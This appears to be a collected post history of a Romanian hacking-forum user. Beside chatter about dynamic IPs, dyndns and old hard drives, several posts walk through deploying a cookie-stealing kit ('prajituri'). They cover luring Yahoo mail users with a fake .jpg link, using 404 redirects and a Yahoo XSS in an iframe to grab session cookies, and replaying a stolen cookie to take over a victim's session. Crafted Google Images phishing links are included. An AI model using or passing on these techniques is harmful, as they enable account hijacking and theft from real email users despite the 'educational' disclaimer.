loki

un tutorial video cu ce? Scenariu: - scena 1: instalare windows commander - scena 2: apasare tasta F5 (Sau windows: start-run-cmd-ftp-o-site-user-parola-md prajituri-cd-prajituri-cp....blabla ca n-am rabdare) Zi-mi ca fac un video cu asta. Chiar tre sa repet ca am muncit o zi intreaga ca sa mearga din prima sa copii un amarat de folder pe un host? si daca nu merge inseamna ca depinde de host, de diverse erori la care nu m-am gandit si probabil n-o sa imi vina in cap niciodata pana ma lovesc eu de ele?

E inutil tutorial video care iti arata doar sa copii un folder pe ftp. Totul e presetat. Erori apar insa din diverse motive. - daca nu merge include, salvati o pagina cu eroare, orice, o pagina ca sa ii apara userului prima data. Si dati include "pagina.htm" daca e locala sau inclulde "http://site.com/pagina.htm" daca e din alta parte. Nu orice pagina se poate include. - cred ca in functie de hosturi apar si restrictii la copierea .htaccess sau la scrierea fisierelor pe disc. - Puteti adauga din grabberul RST bucatica de cod care trimite mail, am lasat intacte numele variabilelor deci ar merge.

este de incurajat ca normal nici legal nu e sa le tii ca mp3-uri fara sa le cumperi

nu-i vorba de cul, e vorba doar ca e extreem de evident Pe de alta parte sunt multi carora nu le trece prin cap sa dea un google: vezi milioanele de intrebari "cum fac" de prin forum. P-aia ii ajuta

ce coincidenta: aseara chiar am visat ca exista unul. La 5 dimineata mi-a pierit somnul si m-am apucat sa-l caut. La 5 si 10 m-am culcat la loc fara sa dau de el. EDIT: eu am unu sa te "log out". Da mi-ai dat o ideeee, cred ca stiu pe unde bati...

nu e antimanu? daca il vreti il am si pe ala pe undeva.

are . in fata stiu ca e mai greu foloseste un windows commander sau total commander, nu stiu daca merge cu ftp din windows. Refresh sa vezi daca e acolo

Acum hai sa-l facem mai picant Testati cu astea, apoi trimiteti pe email linkuri de genul (fara localhost): http:// images.google.ro/imgres?imgurl=http://localhost/prajituri/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG&imgrefurl=http://galerie.dyn.ro/harby/vara2006/mare/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG.html&h=480&w=640&sz=41&hl=ro&start=3&tbnid=lMIGwH51Gnb3AM:&tbnh=103&tbnw=137&prev=/images%3Fq%3Ddiscoteca%26gbv%3D2%26hl%3Dro%26sa%3DG Cine mananca google pe paine nu se abtine sa dea click pe aia mica de sus Mai sadic: se executa in frame-ul google (aici mergea o pagina de la google cu not found ceva) http:// images.google.ro/imgres?imgurl=http://localhost/prajituri/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG&imgrefurl=http://localhost/prajituri/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG.html&h=480&w=640&sz=41&hl=ro&start=3&tbnid=lMIGwH51Gnb3AM:&tbnh=103&tbnw=137&prev=/images%3Fq%3Ddiscoteca%26gbv%3D2%26hl%3Dro%26sa%3DG In cazul 2 fisierul de momeala va fi un html care probabil va contine un redirect

Nici eu nu reusesc nush de ce .. Ma incurc undeva da nush unde incercati cu asta: http://rstcenter.com/forum/yah00-cookie-grabber-bazat-pe-redirect-404-t12300.rst am inclus si xss-ul gasit recent Ideea e ca furi cookie daca ii dai omului linkul pe mail in yahoo. Daca esti pe messenger nu prea ai sanse. Grabberul asta construieste un html similar celui vechi in care ai link direct spre mailul omului. Si un cookie yahoo nu traieste mai mult de cateva zile (teoretic 24 ore) La yahoo metoda este rara, ai posibilitatea unui link. La alte domenii cam trebuie sa faci manual. Uite: la neogen de exemplu daca ai un cookie valid dai un login cu remember password si apoi editezi cookie-ul si inlocuiesti cid= cu codul sustras de la victima. La fel, ai acces la sesiunea victimei.

MAC-ul nu-i a placii de retea? am schimbat-o de 2 ori intr-un an. da 7 zile fara net... nu ma risc. Si asa resetez compul o data pe luna.

ei, notiuni de calcul intern, de reprezentarea numerelor (float, double) prin mantisa si exponent (stii cum iti arata un calculator de buzunar cand da eroare de depasire: ceva gen 1,12345E... ei E nu inseamna eroare ci exponent, deci inmultit cu 10^ceva). Da un google si afli exact ca nu mai stiu sa le explic.

Acesta este o adaptare a cookie grabber-ului facut de echipa RST. (sa nu fie cu suparare ca am inclus 80% sursele grabberului vechi. Am lasat creditele in comments) Este un tutorial in scop educativ. Nu incurajeaza frauda, nu-mi asum nici o responsabilitate pentru utilizarea acestui tutorial in alte scopuri. Cel mai important este sa invatati sa va feriti de link-uri primite pe email chiar daca apar total inofensive. download: http://rapidshare.com/files/123535272/prajituri.zip.html Prezinta o metoda diferita de cookie stealing: bazata pe accesarea unei pagini inexistente. Prezinta avantajul unei ascundere a xss-ului si a intentiei prin trimiterea unui link aparent inofensiv: o fotografie Functionare: - Se trimite un mail victimei continand printre altele un link, de exemplu: http://atacatorul.com/prajituri/eu_sexiii.jpg - Pe serverul atacatorul.com NU exista eu_sexiii.jpg deci se genereaza o eroare 404 Page Not Found - Aici intervine .htaccess care contine tratarea erorii 404 prin redirectarea spre main.php - Pe tot parcursul operatiilor in address bar ramane acelasi link: eu_sexiii.jpg - main.php include o pagina de momeala (am luat de la google) dar puteti baga un "Connection Time Out" - de asemenea intr-un iframe se executa redirect-urile necesare printr-un XSS yahoo - index.php accesat in iframe va salva cookie-urile in folderul grabbed (in fisiere separate). Nu trimite mail, puteti adauga rutina daca aveti mail pe server. - fisierul momeala.jpg va fi copiat sub numele paginii accesate initial - userul va accesa eventual a doua oara link-ul si ii va aparea corect "eu_sexiii.jpg" (de aceasta data fisierul exista, grabberul nu mai este accesat) Instalare: - copiati folder-ul prajituri (un nume aparent dragut). - toate link-urile le veti trimite pe email cu adresa http://atacatorul.com/prajituri/ceva.jpg deoarece redirect-ul 404 va functiona doar in acel folder, "prajituri". - daca schimbati numele folderului editati .htaccess cu numele noului folder - robots.txt are scopul de a opri roboteii google Setari: main.php - $shortlog = numele fisierului cu IP-uri (in caz ca nu ati furat cookies aveti bucuria unui IP). Daca e mare il deschideti frumos cu excell si dati autoarange. - $momeala = fotografia care va inlocui link-ul trimis pe email dupa culesul cookieului - $included = puneti un link la o pagina cu eroare preferabil un timeout sa nu bata la ochi; index.php = numele e intentionat, accesand folderul va fi accesat automat index-ul. Scriu si mai pe scurt <iframe="./">. Daca schimbati numele automat schimbati si link-ul din iframe. - $xss = un xss yahoo, daca e unul mai simplu scrieti doar adresa pana la variabila afectata. Am inclus unul, iar mai jos apare formula de redirect - $cookiefolder = folderul unde va salva sub forma html paginile continand cookie-urile. Nu este nevoie sa adaugati numele site-ului la redirect, si-l ia singur. Va rog sa semnalati orice erori constatate. Lokipaki ERATA - in index.php $cookefolder="./grabbed/"; a se inlocui cu $cookiefolder="./grabbed/"; am mancat o litera - in citeste-ma.txt in loc de grabber.php este index.php nu mai fac reupload pentru asta

ei, tu stii ca mai scap si cate o prostie da asa invata omu, uneori din intrebari tampite.

Ah cautam ceva din google cautand pe google si am dat de asta (poate ati dat si voi la vremea aia, eu nu): http://www.google.com/tisp/notfound.html E pagina lor cu pacaleli de 1 aprilie de anul asta. Citez: Frumoasa pagina, o pastrez pt redirecturi. Click pe this one and this one and this one...

Deh, asta e RDS! - IP dinamic DHCP dar static (ramas fix de vreun an) - daca suni la ei iti raspunde o operatoare "Va putem ajuta cu ALTCEVA?"

metoda 2 n-a mers. ipconfig /release + 7 ore cabluri scoase, modem stins. RDS catv.

hmm mai e si gogule si bloagele de ajutor... nu e chiar un secret EDIT: azi am vazut mesajul... s-a dus in bulk

si sub copertine se afla... "cred ca"-ul era din cauza ca nu eram acasa:D Multsam de incurajari! :wink: PS simm-urile le-am maritat... inca exista clienti la asa ceva... :shock: Vazui mai tarziu, n-a prins familia laptop , nu am piese. PS2 Acu am aflat uitandu-ma la poza ca si primu e bun: 800 wow... imi pun linuxu pe el, de cand astept o partitie goala... (doream sa-mi fac cont din nou la cyberspace.org din cauza asta, nu mai tin minte de ce am pierdut un cont, dar ca apropo e frumos acolo, sun, unix sau linux, ceva de genul, uhh) PS3 acuma serios: pentru piese, probabil chiar de laptop, ma pot interesa (am obtinut multe relicve istorice dintr-o sursa de-a mea). Doar ca Vasluiul e departe de Buc.

al 3-lea e cel mai bun da se indoaie pinii de fiecare data primul e Western Digital (WD) Al doilea cred ca Seagate si stiti ce kkturi de harduri scoteau Seagate inainte?

are si no-ip? asta nu stiam Pai iti recomand cont pe no-ip atunci, primesti confirmarea mentinerii domeniului cam o data la 3 luni, nu la o luna ca pe dyndns. Si imi place si interfata destul de simpla.

Pick a number

thank uuuuu! Cheers! UFF ..... am fugit la servici ca iar intarzii!!!

daca nu-ti trebuie neaparat IP (daca vrei sa iti faci un hosting ceva) fa-ti un subdomeniu la dyndns.com si din auzite se poate seta sa se updateze automat in cazul IP-urilor dinamice. Doar ca pentru gratuitati primesti mail lunar sa-ti aprobi mentinerea subdomeniului PS publica la "ajutor" data viitoare, aici sunt tutoriale

zici de fiberlink? Ca si la catv e dinamic... dar e fix, poti sa-ti scoti si modemu din priza ca tot nu ti-l schimba. @-Lucifer- metoda 2 merge pe catv RDS? ipconfig /release iti taie accesul cu modemul, dar acesta stiu ca te asteapta sa-ti dea IP-ul pe care-l stie inapoi. Singurul lucru neincercat e sa dau si releasa sa-l las si scos din priza... m-am rugat si de RDS sa-mi schimbe IP si au zis ca nem tu dom si nu se poate.

OAU! :shock: Pai adica daca urmaresti condoleantele ai 6 zile timp sa spargi mortului mailu si sa-i furi din testament carti de credit fara sa te caute... asta daca nu fac rudele spiritism. Dar trebuie sa ai grija, nu te spovedi ca se afla acolo sus si iti bantuie mortu contu de email cu spamuri. As stoca un mail de genul ca in bancul ala cu vaduva "Draga, te astept maine, nu lua multe haine cu tine ca e foarte cald aici"